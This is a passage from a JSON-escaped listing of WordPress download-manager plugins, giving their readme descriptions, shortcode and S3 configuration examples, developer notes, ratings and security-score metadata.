\u003Ccode>[m1dll noext=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, displays no breadcrumb: \u003Ccode>[m1dll nobreadcrumb=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, with file and folder time with own format \u003Ccode>[m1dll ftime=\"Y-m-d, H:i\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, with file and folder date and time (standard from WordPress) \u003Ccode>[m1dll ftime=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, with file and folder self-formatted date \u003Ccode>[m1dll ftime=\"Y-m-d\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, with file date and time (standard from WordPress) \u003Ccode>[m1dll filetime=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, with folder date and time (standard from WordPress) \u003Ccode>[m1dll foldertime=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Fol>\n","This plugin easily displays the folders and files from a selected directory. 
It can be placed by shortcode in any post.",400,18057,94,21,"2025-11-25T14:32:00.000Z","6.8.5",[218,21,22,219,23],"attachment","filemanager","http:\u002F\u002Fmaennchen1.de","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fm1downloadlist.0.24.zip",78,2,"2025-04-04 00:00:00",{"slug":226,"name":227,"version":228,"author":229,"author_profile":230,"description":231,"short_description":232,"active_installs":28,"downloaded":233,"rating":196,"num_ratings":56,"last_updated":234,"tested_up_to":235,"requires_at_least":236,"requires_php":18,"tags":237,"homepage":240,"download_link":241,"security_score":242,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"download-manager-ms","Download Manager MS","1.1.0","bquade","https:\u002F\u002Fprofiles.wordpress.org\u002Fbquade\u002F","\u003Cp>Download manager with:\u003Cbr \u002F>\n* multisite support\u003Cbr \u002F>\n* download buttons and forms\u003Cbr \u002F>\n* easy file uploads\u003Cbr \u002F>\n* stats charts\u003Cbr \u002F>\n* much more\u003C\u002Fp>\n","Download manager with multisite support. 
Stats charts, shortcodes for download buttons and forms, easy file uploads, and much more.",4570,"2012-12-09T18:05:00.000Z","3.5.0","3.1.0",[20,238,21,239,23],"download-manager","file-manager","http:\u002F\u002Fbqplugins.com\u002Fbq-download","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-manager-ms.1.1.0.zip",85,{"slug":244,"name":245,"version":246,"author":247,"author_profile":248,"description":249,"short_description":250,"active_installs":28,"downloaded":251,"rating":29,"num_ratings":29,"last_updated":252,"tested_up_to":253,"requires_at_least":254,"requires_php":253,"tags":255,"homepage":258,"download_link":259,"security_score":260,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"hizzle-downloads","Simple Download Manager – Hizzle Downloads","1.3.0","Noptin Newsletter Team","https:\u002F\u002Fprofiles.wordpress.org\u002Fpicocodes\u002F","\u003Cp>\u003Cstrong>A simple WordPress download manager for secure file sharing, access control, and download tracking — perfect for digital products.\u003C\u002Fstrong>\u003Cbr \u002F>\n★★★★★\u003C\u002Fp>\n\u003Cp>Do you need a simple yet powerful way to manage file downloads on your WordPress site? This plugin makes it easy to upload, organize, and control access to downloadable files of any type. 
Whether you are sharing free resources, selling digital products, or delivering private documents, this plugin gives you full control over who can download your files and when.\u003C\u002Fp>\n\u003Cp>With unlimited downloads, flexible restrictions, and detailed tracking, you can confidently provide files to your audience while keeping them secure.\u003C\u002Fp>\n\u003Ch3>Key Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Add unlimited downloadable files\u003C\u002Fstrong> – Add and manage as many downloadable files as you need, with no limits.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Password Protection\u003C\u002Fstrong> – Protect individual files with custom passwords so only authorized users can access them.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Restrict downloads to specific user roles\u003C\u002Fstrong> – Control file access based on WordPress user roles, ensuring that only administrators, editors, subscribers, or custom roles can download.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Restrict downloads to specific IP addresses\u003C\u002Fstrong> – Restrict downloads to specific IP addresses to prevent abuse or unauthorized sharing.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Restrict downloads to specific users\u003C\u002Fstrong> – Assign downloads to specific registered users for secure, private file delivery.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Restrict downloads to newsletter subscribers\u003C\u002Fstrong> – Restrict downloads to Noptin newsletter subscribers, making it an excellent tool for lead generation.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Track file downloads\u003C\u002Fstrong> – Track every file download with detailed statistics, helping you understand how your files are being accessed.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Simple Management\u003C\u002Fstrong> – A user-friendly interface makes uploading and managing files straightforward, even for beginners.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Why Use This 
Plugin?\u003C\u002Fh3>\n\u003Cp>Managing 
downloads manually in WordPress can be difficult. Links can be shared publicly, access can’t easily be restricted, and tracking is limited. This plugin solves those problems by giving you advanced tools to:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Protect digital products such as \u003Cstrong>software, themes, and plugins\u003C\u002Fstrong>.\u003C\u002Fli>\n\u003Cli>Share private \u003Cstrong>PDF documents, contracts, or reports\u003C\u002Fstrong> securely with clients.\u003C\u002Fli>\n\u003Cli>Provide exclusive resources like \u003Cstrong>eBooks, whitepapers, and templates\u003C\u002Fstrong> to email subscribers.\u003C\u002Fli>\n\u003Cli>Control access to files for \u003Cstrong>membership sites and online courses\u003C\u002Fstrong>.\u003C\u002Fli>\n\u003Cli>Monitor and analyze download activity to make better business decisions.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Benefits for Your Website\u003C\u002Fh3>\n\u003Cp>By installing this plugin, you’ll be able to:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Grow your email list by offering subscriber-only downloads.\u003C\u002Fli>\n\u003Cli>Monetize your website by controlling access to premium resources.\u003C\u002Fli>\n\u003Cli>Increase security by preventing unauthorized downloads and link sharing.\u003C\u002Fli>\n\u003Cli>Gain insights into how your downloads are performing.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Whether you’re a blogger, developer, marketer, educator, or business owner, this plugin gives you all the tools you need to manage file downloads effectively in WordPress.\u003C\u002Fp>\n\u003Cp>Take control of your downloads today and provide a seamless, secure experience for your users.\u003C\u002Fp>\n\u003Ch3>S3 Sync Configuration\u003C\u002Fh3>\n\u003Cp>The plugin supports automatic syncing of uploaded files to S3-compatible storage services like Amazon S3 and Cloudflare R2.\u003C\u002Fp>\n\u003Cp>To enable this feature, define the following constants in your \u003Ccode>wp-config.php\u003C\u002Fcode> 
file:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>\u002F\u002F Required constants\ndefine( 'HIZZLE_DOWNLOADS_S3_ENDPOINT', 'https:\u002F\u002F{$bucket}.s3.{$region}.amazonaws.com' );\ndefine( 'HIZZLE_DOWNLOADS_S3_ACCESS_KEY', 'your-access-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_SECRET_KEY', 'your-secret-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_BUCKET', 'your-bucket-name' );\ndefine( 'HIZZLE_DOWNLOADS_S3_REGION', 'your-bucket-region' );\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Ch4>How it works\u003C\u002Fh4>\n\u003Cp>When the S3 credentials are configured:\u003Cbr \u002F>\n– Files uploaded to the \u003Ccode>wp-content\u002Fuploads\u002Fhizzle_uploads\u002F\u003C\u002Fcode> directory are automatically synced to your S3-compatible storage\u003Cbr \u002F>\n– Files are organized by hostname (e.g., \u003Ccode>my-site.com\u002Fpath\u002Fto\u002Ffile.zip\u003C\u002Fcode>)\u003Cbr \u002F>\n– The sync happens automatically when downloads are created or updated\u003C\u002Fp>\n\u003Ch4>Cloudflare R2 Example\u003C\u002Fh4>\n\u003Cp>Set your Cloudflare details as shown below:-\u003C\u002Fp>\n\u003Cpre>\u003Ccode>define( 'HIZZLE_DOWNLOADS_S3_ACCESS_KEY', 'your-r2-access-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_SECRET_KEY', 'your-r2-secret-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_BUCKET', 'your-bucket-name' );\ndefine( 'HIZZLE_DOWNLOADS_S3_ENDPOINT', 'https:\u002F\u002Fyour-account-id.r2.cloudflarestorage.com\u002Fyour-bucket-name' );\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Ch4>DigitalOcean Spaces Example\u003C\u002Fh4>\n\u003Cp>Set your DigitalOcean Spaces details as shown below:-\u003C\u002Fp>\n\u003Cpre>\u003Ccode>define( 'HIZZLE_DOWNLOADS_S3_ACCESS_KEY', 'your-spaces-access-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_SECRET_KEY', 'your-spaces-secret-key' );\ndefine( 'HIZZLE_DOWNLOADS_S3_BUCKET', 'your-space-name' );\ndefine( 'HIZZLE_DOWNLOADS_S3_ENDPOINT', 'https:\u002F\u002Fyour-space-name.nyc3.digitaloceanspaces.com' );\n\u003C\u002Fcode>\u003C\u002Fpre>\n","Easily add, restrict, and track digital 
downloads in WordPress — protect files with passwords, user roles, IPs, or subscriber access.",4024,"2026-03-30T06:39:00.000Z","7.0","5.5",[256,238,21,23,257],"digital-downloads","restrict-downloads","https:\u002F\u002Fhizzle.co\u002Fdownload-manager\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhizzle-downloads.1.3.0.zip",100,{"slug":262,"name":263,"version":264,"author":265,"author_profile":266,"description":267,"short_description":268,"active_installs":29,"downloaded":269,"rating":29,"num_ratings":29,"last_updated":270,"tested_up_to":253,"requires_at_least":271,"requires_php":272,"tags":273,"homepage":277,"download_link":278,"security_score":260,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"kitgenix-document-manager","Kitgenix Document Manager","1.0.0","Kitgenix","https:\u002F\u002Fprofiles.wordpress.org\u002Fkitgenix\u002F","\u003Cp>Kitgenix Document Manager lets admins upload documents and share a stable link like:\u003C\u002Fp>\n\u003Cp>\u002Fkitgenix-document-manager\u002F{slug}\u002F\u003C\u002Fp>\n\u003Cp>When you replace the file, the link stays the same and serves the new version.\u003C\u002Fp>\n\u003Ch3>Key Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Stable links: replace the file without changing the URL\u003C\u002Fli>\n\u003Cli>Admin documents table with search, copy link, and “Open link” action\u003C\u002Fli>\n\u003Cli>Quick edit modal (popup) for editing documents without leaving the table\u003C\u002Fli>\n\u003Cli>Document Categories: create categories and assign documents for easier organization\u003C\u002Fli>\n\u003Cli>Visibility controls: Public or Private documents\u003C\u002Fli>\n\u003Cli>Private behavior: redirect to login or return 403\u003C\u002Fli>\n\u003Cli>Serving mode: Inline (browser) or Download (attachment)\u003C\u002Fli>\n\u003Cli>Optional version history per document, including restore\u002Fdelete for older versions\u003C\u002Fli>\n\u003Cli>Bulk version cleanup: delete all old 
versions for a document (Versions tab + modal action)\u003C\u002Fli>\n\u003Cli>Select from Media Library: optionally pick an existing Media Library file instead of uploading\u003C\u002Fli>\n\u003Cli>Safer serving: correct Content-Type where possible, security headers, and conditional caching for public docs\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Usage\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Go to \u003Cstrong>Kitgenix \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Document Manager\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Add a document (name + optional slug) and upload the initial file\u003C\u002Fli>\n\u003Cli>Copy the stable URL from the table and share it\u003C\u002Fli>\n\u003Cli>To update a document later, use \u003Cstrong>Edit\u003C\u002Fstrong> (modal) and upload a replacement file\u003C\u002Fli>\n\u003Cli>If \u003Cstrong>Keep version history\u003C\u002Fstrong> is enabled for that document, older files will appear in the Versions panel (restore\u002Fdelete)\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>Categories:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Use the \u003Cstrong>Categories\u003C\u002Fstrong> tab to add\u002Fedit\u002Fdelete categories\u003C\u002Fli>\n\u003Cli>Assign a category when adding\u002Fediting a document\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Note: Inline viewing works best for PDFs and images. Office documents (DOCX\u002FXLSX\u002Fetc.) 
typically download because browsers can’t render them natively.\u003C\u002Fp>\n\u003Ch3>Settings\u003C\u002Fh3>\n\u003Cp>Settings are available under the \u003Cstrong>Settings\u003C\u002Fstrong> tab:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Allowed file extensions\u003C\u002Fli>\n\u003Cli>Default visibility (Public\u002FPrivate)\u003C\u002Fli>\n\u003Cli>Serving mode:\n\u003Cul>\n\u003Cli>Inline (browser)\u003C\u002Fli>\n\u003Cli>Download (attachment)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Versioning defaults (keep history by default, delete old versions when history is disabled)\u003C\u002Fli>\n\u003Cli>Private document behavior (login redirect or 403)\u003C\u002Fli>\n\u003Cli>Delete all plugin data on uninstall (optional)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Frontend card options are available under the \u003Cstrong>Frontend\u003C\u002Fstrong> tab:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Default document card button label\u003C\u002Fli>\n\u003Cli>Button style (Outline or Solid)\u003C\u002Fli>\n\u003Cli>Preview image size\u003C\u002Fli>\n\u003Cli>File type\u002Ffile size alignment\u003C\u002Fli>\n\u003Cli>Button alignment\u003C\u002Fli>\n\u003Cli>Button colors (normal + hover)\u003C\u002Fli>\n\u003Cli>Option to open the “View” button in a new tab\u003C\u002Fli>\n\u003Cli>Toggle showing file type and file size\u003C\u002Fli>\n\u003Cli>Toggle showing document description\u003C\u002Fli>\n\u003Cli>Shortcode Builder (generate a shortcode for one or multiple documents)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Security & Caching\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Private documents are not cached (no-store) and require login (or return 403)\u003C\u002Fli>\n\u003Cli>Public documents use conditional caching (ETag\u002FLast-Modified) so browsers\u002FCDNs can revalidate efficiently (including 304 Not Modified responses)\u003C\u002Fli>\n\u003Cli>Responses include security hardening headers like \u003Ccode>X-Content-Type-Options: 
nosniff\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Private documents include \u003Ccode>X-Robots-Tag: noindex, nofollow\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>External Services\u003C\u002Fh3>\n\u003Cp>This plugin includes a shared “Kitgenix hub” component in wp-admin which may fetch publicly available plugin metadata from WordPress.org using the WordPress core \u003Ccode>plugins_api()\u003C\u002Fcode> function (WordPress.org Plugins API).\u003C\u002Fp>\n\u003Cul>\n\u003Cli>When it runs: only in wp-admin (Kitgenix plugin admin pages)\u003C\u002Fli>\n\u003Cli>Data sent: plugin slug(s) (no personal data)\u003C\u002Fli>\n\u003Cli>Data received: publicly available plugin information (e.g. active installs, ratings)\u003C\u002Fli>\n\u003Cli>Caching: responses are cached locally using transients for ~1 day:\n\u003Cul>\n\u003Cli>\u003Ccode>kitgenix_hub_wporg_active_installs_v1\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_hub_wporg_ratings_v1\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Developer Notes (Internal Reference)\u003C\u002Fh3>\n\u003Cp>This section documents internal identifiers used by the plugin (useful for developers, debugging, and advanced users).\u003C\u002Fp>\n\u003Ch4>Options (Settings)\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Option name: \u003Ccode>kitgenix_document_manager_settings\u003C\u002Fcode> (constant: \u003Ccode>KITGENIX_DOCUMENT_MANAGER_OPTION_NAME\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>Settings group: \u003Ccode>kitgenix_document_manager_settings_group\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Keys (defaults):\n\u003Cul>\n\u003Cli>\u003Ccode>allowed_extensions\u003C\u002Fcode>: \u003Ccode>[\"pdf\",\"doc\",\"docx\",\"xls\",\"xlsx\",\"ppt\",\"pptx\",\"txt\"]\u003C\u002Fcode> (stored as an array; comma-separated strings are accepted and normalized)\u003C\u002Fli>\n\u003Cli>\u003Ccode>default_visibility\u003C\u002Fcode>: \u003Ccode>public\u003C\u002Fcode> 
(public|private)\u003C\u002Fli>\n\u003Cli>\u003Ccode>serving_mode\u003C\u002Fcode>: \u003Ccode>attachment\u003C\u002Fcode> (attachment|inline)\u003C\u002Fli>\n\u003Cli>\u003Ccode>keep_version_history\u003C\u002Fcode>: \u003Ccode>true\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>delete_old_versions\u003C\u002Fcode>: \u003Ccode>false\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>private_behavior\u003C\u002Fcode>: \u003Ccode>login\u003C\u002Fcode> (login|403)\u003C\u002Fli>\n\u003Cli>\u003Ccode>delete_data_on_uninstall\u003C\u002Fcode>: \u003Ccode>false\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_label\u003C\u002Fcode>: \u003Ccode>\"View\"\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_style\u003C\u002Fcode>: \u003Ccode>\"outline\"\u003C\u002Fcode> (outline|solid)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_open_new_tab\u003C\u002Fcode>: \u003Ccode>false\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_show_file_type\u003C\u002Fcode>: \u003Ccode>true\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_show_file_size\u003C\u002Fcode>: \u003Ccode>true\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_show_description\u003C\u002Fcode>: \u003Ccode>false\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_image_size\u003C\u002Fcode>: \u003Ccode>96\u003C\u002Fcode> (px)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_meta_alignment\u003C\u002Fcode>: \u003Ccode>\"justify\"\u003C\u002Fcode> (justify|left|center|right)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_alignment\u003C\u002Fcode>: \u003Ccode>\"center\"\u003C\u002Fcode> (justify|left|center|right)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_text_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_bg_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_border_color\u003C\u002Fcode>: 
\u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_hover_text_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_hover_bg_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003Cli>\u003Ccode>card_button_hover_border_color\u003C\u002Fcode>: \u003Ccode>\"\"\u003C\u002Fcode> (hex or blank)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Data Model\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Custom Post Type: \u003Ccode>kitgenix_dm_doc\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Taxonomy (categories): \u003Ccode>kitgenix_dm_cat\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Capability: \u003Ccode>manage_kitgenix_document_manager_documents\u003C\u002Fcode> (assigned to Administrators and Shop Managers on activation)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Post Meta\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ccode>_kitgenix_document_manager_current_attachment_id\u003C\u002Fcode> (current attachment ID)\u003C\u002Fli>\n\u003Cli>\u003Ccode>_kitgenix_document_manager_description\u003C\u002Fcode> (optional document description shown on cards)\u003C\u002Fli>\n\u003Cli>\u003Ccode>_kitgenix_document_manager_visibility\u003C\u002Fcode> (\u003Ccode>public\u003C\u002Fcode>|\u003Ccode>private\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>_kitgenix_document_manager_versioning_enabled\u003C\u002Fcode> (0|1)\u003C\u002Fli>\n\u003Cli>\u003Ccode>_kitgenix_document_manager_versions\u003C\u002Fcode> (array of attachment IDs)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Stable Link Endpoint\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Base path: \u003Ccode>\u002Fkitgenix-document-manager\u002F{slug}\u002F\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Query var: \u003Ccode>kitgenix_document_manager_slug\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>REST API\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ccode>GET 
\u002Fwp-json\u002Fkitgenix-document-manager\u002Fv1\u002Fdoc\u002F{slug}\u003C\u002Fcode>\n\u003Cul>\n\u003Cli>Returns: \u003Ccode>slug\u003C\u002Fcode>, \u003Ccode>title\u003C\u002Fcode>, \u003Ccode>updated\u003C\u002Fcode> (ISO 8601), \u003Ccode>visibility\u003C\u002Fcode>, \u003Ccode>stable_url\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Private documents return 403 when logged out\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Shortcode\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Ccode>[kitgenix_document_manager_link slug=\"my-doc\" label=\"Download\"]\u003C\u002Fcode>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>If \u003Ccode>label\u003C\u002Fcode> is omitted, the document title is used.\u003C\u002Fli>\n\u003Cli>Private documents render nothing for logged-out users.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ccode>[kitgenix_document_manager_document slug=\"my-doc\" button_label=\"View\"]\u003C\u002Fcode>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Renders a small preview (thumbnail\u002Ficon), the document title, file type, file size, and a “View” button.\u003C\u002Fli>\n\u003Cli>Private documents render nothing for logged-out users.\u003C\u002Fli>\n\u003Cli>Optional attributes: \u003Ccode>button_style=\"outline\"|\"solid\"\u003C\u002Fcode>, \u003Ccode>image_size=\"96\"\u003C\u002Fcode>, \u003Ccode>meta_align=\"justify\"|\"left\"|\"center\"|\"right\"\u003C\u002Fcode>, \u003Ccode>button_align=\"justify\"|\"left\"|\"center\"|\"right\"\u003C\u002Fcode>, \u003Ccode>show_description=\"0\"|\"1\"\u003C\u002Fcode>, \u003Ccode>new_tab=\"0\"|\"1\"\u003C\u002Fcode>, \u003Ccode>show_type=\"0\"|\"1\"\u003C\u002Fcode>, \u003Ccode>show_size=\"0\"|\"1\"\u003C\u002Fcode>.\u003C\u002Fli>\n\u003Cli>To render multiple documents inline, use \u003Ccode>slugs\u003C\u002Fcode> instead of \u003Ccode>slug\u003C\u002Fcode>, e.g. 
\u003Ccode>[kitgenix_document_manager_document slugs=\"doc-a,doc-b,doc-c\"]\u003C\u002Fcode>.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Admin Actions (admin-post.php)\u003C\u002Fh4>\n\u003Cp>The Document Manager screen uses admin-post actions, including:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ccode>kitgenix_document_manager_document_save\u003C\u002Fcode>\n\u003Cul>\n\u003Cli>Nonce field: \u003Ccode>kitgenix_document_manager_document_nonce\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Nonce action: \u003Ccode>kitgenix_document_manager_document_save\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_document_delete\u003C\u002Fcode> (nonce query parameter \u003Ccode>nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_version_restore\u003C\u002Fcode> (nonce query parameter \u003Ccode>nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_version_delete\u003C\u002Fcode> (nonce query parameter \u003Ccode>nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_versions_delete_all\u003C\u002Fcode> (nonce query parameter \u003Ccode>nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_category_save\u003C\u002Fcode>\n\u003Cul>\n\u003Cli>Nonce field: \u003Ccode>kitgenix_document_manager_category_nonce\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Nonce action: \u003Ccode>kitgenix_document_manager_category_save\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_category_delete\u003C\u002Fcode> (nonce query parameter \u003Ccode>nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>WordPress action hook names for the above screen 
actions:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_document_save\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_document_delete\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_version_restore\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_version_delete\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_versions_delete_all\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_category_save\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_post_kitgenix_document_manager_category_delete\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>The (hidden) CPT edit screen metabox uses:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ccode>kitgenix_document_manager_upload_initial\u003C\u002Fcode> (nonce field \u003Ccode>kitgenix_document_manager_file_nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>kitgenix_document_manager_replace_file\u003C\u002Fcode> (nonce field \u003Ccode>kitgenix_document_manager_file_nonce\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>Visibility\u002Fversioning meta save nonce:\n\u003Cul>\n\u003Cli>Nonce field: \u003Ccode>kitgenix_document_manager_meta_nonce\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>Nonce action: \u003Ccode>kitgenix_document_manager_save_meta\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Hooks, Filters & Assets (Internal)\u003C\u002Fh4>\n\u003Cp>This list is intended as a comprehensive map of WordPress integration points used by the plugin.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ccode>plugins_loaded\u003C\u002Fcode> (bootstrap init)\u003C\u002Fli>\n\u003Cli>\u003Ccode>init\u003C\u002Fcode> (register CPT\u002Ftaxonomy; add rewrite rules)\u003C\u002Fli>\n\u003Cli>Filter: \u003Ccode>query_vars\u003C\u002Fcode> (adds query var 
\u003Ccode>kitgenix_document_manager_slug\u003C\u002Fcode>)\u003C\u002Fli>\n\u003Cli>\u003Ccode>template_redirect\u003C\u002Fcode> (serves stable link responses)\u003C\u002Fli>\n\u003Cli>\u003Ccode>rest_api_init\u003C\u002Fcode> (registers REST route)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_menu\u003C\u002Fcode> (registers Kitgenix menu + Document Manager submenu)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_head\u003C\u002Fcode> (outputs Kitgenix admin menu icon CSS)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_init\u003C\u002Fcode> (registers Settings API option)\u003C\u002Fli>\n\u003Cli>\u003Ccode>admin_enqueue_scripts\u003C\u002Fcode> (enqueues Kitgenix hub CSS; enqueues Document Manager admin assets)\u003C\u002Fli>\n\u003Cli>\u003Ccode>add_meta_boxes\u003C\u002Fcode> (adds the CPT file\u002Fvisibility metaboxes)\u003C\u002Fli>\n\u003Cli>\u003Ccode>save_post\u003C\u002Fcode> (saves visibility + 